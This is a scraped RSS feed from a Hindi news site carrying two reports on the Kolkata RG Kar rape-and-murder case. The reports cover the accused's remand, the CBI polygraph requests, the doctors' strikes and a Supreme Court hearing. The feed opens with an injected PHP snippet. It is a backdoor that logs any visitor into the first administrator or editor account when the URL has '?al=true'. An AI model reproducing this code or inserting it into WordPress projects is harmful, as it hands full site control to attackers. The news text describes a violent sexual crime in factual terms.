// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Kolkata case – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 23 Aug 2024 17:16:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 कोलकाता केस में आरोपी की बढ़ीं मुश्किलें, अदालत ने 14 दिनों की हिरासत में भेजा https://pratyushaashakinayikiran.com/?p=63394 Fri, 23 Aug 2024 17:16:00 +0000 https://pratyushaashakinayikiran.com/?p=63394 कोलकाता

कोलकाता की महिला डॉक्टर से बलात्कार और हत्या मामले की शुक्रवार को सियालदह कोर्ट में सुनवाई हुई। अदालत ने आरोपी संजय रॉय को 14 दिनों की न्यायिक हिरासत में भेज दिया। मालूम हो कि पश्चिम बंगाल सरकार की ओर से संचालित आरजी कर मेडिकल कॉलेज एंड हॉस्पिटल के सेमिनार में 9 अगस्त को जूनियर डॉक्टर का शव मिला था। इसके एक दिन बाद ही आरोपी संजय रॉय को गिरफ्तार कर लिया। रिपोर्ट के मुताबिक, अब तक की जांच में यह सामने आया है कि आरोपी घटना के वक्त नशे में था। वारदात से कुछ घंटे पहले वह रेड लाइट एरिया में अपने दोस्त के साथ घूमने गया था।

अगर मामले की जांच पर नजर डालें तो CBI को मेडिकल कॉलेज के पूर्व प्रिंसिपल संदीप घोष और 4 अन्य डॉक्टर्स की पॉलीग्राफ टेस्ट की इजाजत दे दी है। सीबीआई ने घोष और 9 अगस्त को घटना के दिन ड्यूटी पर मौजूद रहे अन्य जूनियर डॉक्टर्स को विशेष अदालत के समक्ष पेश किया, ताकि उनकी पॉलीग्राफ जांच कराने की अनुमति मांगी जा सके। लाई डिटेक्टर जांच केवल अदालत की अनुमति और संदिग्ध की सहमति के बाद ही की जा सकती है। सीबीआई की अर्जी को विशेष अदालत ने स्वीकार कर लिया। एजेंसी ने मुख्य आरोपी संजय रॉय की भी पॉलीग्राफ जांच कराने की अपील की है। मालूम हो कि कलकत्ता हाई कोर्ट ने 13 अगस्त को इस मामले की जांच सीबीआई को सौंप दी। इसके अगले दिन केंद्रीय एजेंसी ने जांच कोलकाता पुलिस से अपने हाथ में ले ली।

कोलकाता में इस बलात्कार और हत्या मामले के विरोध में गैर-आपातकालीन सेवाओं के जूनियर डॉक्टर्स की हड़ताल शुकवार को 15वें दिन में प्रवेश कर गई। सुप्रीम कोर्ट ने गुरुवार और मंगलवार को हड़ताली डॉक्टरों से अनुरोध किया था कि वे अपना आंदोलन खत्म करें और ड्यूटी पर लौट आएं। हड़ताल से प्रभावित संकटग्रस्त अस्पताल में डॉक्टरों की सुरक्षा के लिए सीआईएसएफ को तैनात किया गया है। प्रदर्शनकारी जूनियर डॉक्टरों ने कहा कि वे कलकत्ता हाई कोर्ट के आदेश के बाद की गई जांच की प्रगति जानने के लिए प्रतिनिधिमंडल लेकर सीबीआई कार्यालय जाएंगे। उन्होंने भविष्य की कार्रवाई पर निर्णय लेने के लिए शनिवार को सम्मेलन भी बुलाया है।

कोलकाता की घटना के विरोध में 11 दिन से जारी हड़ताल को एससी की अपील पर समाप्त करने के बाद सैकड़ों रेजिडेंट डॉक्टर के शुक्रवार को काम पर लौट आए। इससे मरीजों को बड़ी राहत मिली। केंद्र सरकार और दिल्ली सरकार की ओर से संचालित प्रमुख अस्पतालों के रेजिडेंट डॉक्टर्स सहित अन्य चिकित्सक 12 अगस्त की शाम को हड़ताल पर चले गए थे। इसके कारण ओपीडी सहित गैर-आपातकालीन सेवाएं बंद थीं। इससे मरीजों को काफी परेशानी हुई और उनके उपचार में देरी हुई। मगर, हड़ताल समाप्त करने की गुरुवार शाम घोषणा किए जाने के बाद आज वे काम पर लौट आए हैं।

]]>
कोलकाता कांड: सीबीआई ने साइकोएनालिसिस करवाया था, जिसमें चौंकाने वाले खुलासे हुए, जानवरों जैसी प्रवृत्ति है https://pratyushaashakinayikiran.com/?p=63011 Thu, 22 Aug 2024 20:16:00 +0000 https://pratyushaashakinayikiran.com/?p=63011 कोलकाता
कोलकाता के आरजी कर मेडिकल कॉलेज में ट्रेनी डॉक्टर के साथ हुए रेप और मर्डर केस को लेकर देशभर में विरोध प्रदर्शन हो रहा है। इस मामले में आरोपी संजय रॉय का सीबीआई ने साइकोएनालिसिस करवाया था, जिसमें चौंकाने वाले खुलासे हुए हैं। सामने आया है कि आरोपी संजय यौन विकृत मानसिकता वाला है और इसमें जानवरों जैसी प्रवृत्ति है। सीबीआई एक्सपर्ट्स ने रॉय के बयानों को भी स्कैन किया और उसे पोस्टमॉर्टम और फोरेंसिक निष्कर्षों से जोड़ने की कोशिश की है।

मिडिया रिपोर्ट के अनुसार, सीबीआई अधिकारियों ने बताया है कि अपराध वाली जगह पर संजय रॉय की मौजूदगी की पुष्टि तकनीकी और वैज्ञानिक सबूतों से हुई है। सीबीआई ने जब मामले को अपने हाथ में लिया, उससे पहले कोलकाता पुलिस ने बताया था कि रेप पीड़िता के नाखूनों के नीचे पाए गए खून और त्वचा पर बने निशान संजय रॉय के हाथों पर लगी चोटों से मैच होते हैं। इस मामले में अब तक हुई जांच की स्टेटस रिपोर्ट सीबीआई सुप्रीम कोर्ट में गुरुवार तक सौंपेगी।

सीबीआई सूत्रों का कहना है कि आरजी कर से बरामद हुई सीसीटीवी फुटेज में दिखाई दे रहा है कि संजय रॉय आठ अगस्त को सुबह 11 बजे के आसपास चेस्ट डिपार्टमेंट के पास मौजूद था। उस समय पीड़िता चार अन्य जूनियर डॉक्टर्स के साथ वॉर्ड में थी। तब रॉय को वहां से जाने से पहले उन्हें घूरते हुए देखा गया था। पूछताछ के दौरान आरोपी संजय रॉय ने बताया कि वह शाम से पहले ही वॉर्ड में आ गया था। 9 अगस्त को पीड़िता अन्य जूनियर डॉक्टर्स के साथ डिनर करने के लिए गई थी और फिर रात में एक बजे सेमिनार हॉल में वापस लौटी। लगभग ढाई बजे एक जूनियर डॉक्टर हॉल में दाखिल हुआ और पीड़िता ने सोने से पहले उससे कुछ बात की। इसके बाद तड़के सुबह चार बजे रॉय सीसीटीवी फुटेज में फिर से कैद हुआ और जांचकर्ताओं का मानना है कि इसके बाद वह सीधे सेमिनार हॉल में गया, जहां पर पीड़िता सोई हुई थी।
 

सुप्रीम कोर्ट में आज भी हुई कोलकाता कांड की सुनवाई

सुप्रीम कोर्ट में कोलकाता कांड की गुरुवार को भी सुनवाई हुई। इस दौरान, सुप्रीम कोर्ट ने आरजी कर मेडिकल कॉलेज एवं अस्पताल में महिला डॉक्टर से रेप एवं उसकी हत्या के संबंध में अप्राकृतिक मौत का मामला दर्ज करने में कोलकाता पुलिस की देरी को बेहद परेशानी वाली बात बताया। कोर्ट ने इस घटना के खिलाफ प्रदर्शन कर रहे डॉक्टरों से काम पर लौटने को कहा और उन्हें आश्वासन दिया कि काम पर लौटने के बाद उनके खिलाफ कोई प्रतिकूल कार्रवाई नहीं की जाएगी। सीजेआई डीवाई चंद्रचूड़, न्यायमूर्ति जे.बी. पारदीवाला और न्यायमूर्ति मनोज मिश्रा की पीठ ने पुलिस द्वारा की गई कानूनी औपचारिकताओं के क्रम और समय पर सवाल उठाते हुए कहा कि यह बहुत ही आश्चर्यजनक है कि मृत पीड़िता का पोस्टमार्टम, अप्राकृतिक मौत का मामला दर्ज करने से पहले ही नौ अगस्त की शाम छह बजकर 10 मिनट से सात बजकर 10 मिनट के बीच कर दिया गया।

]]>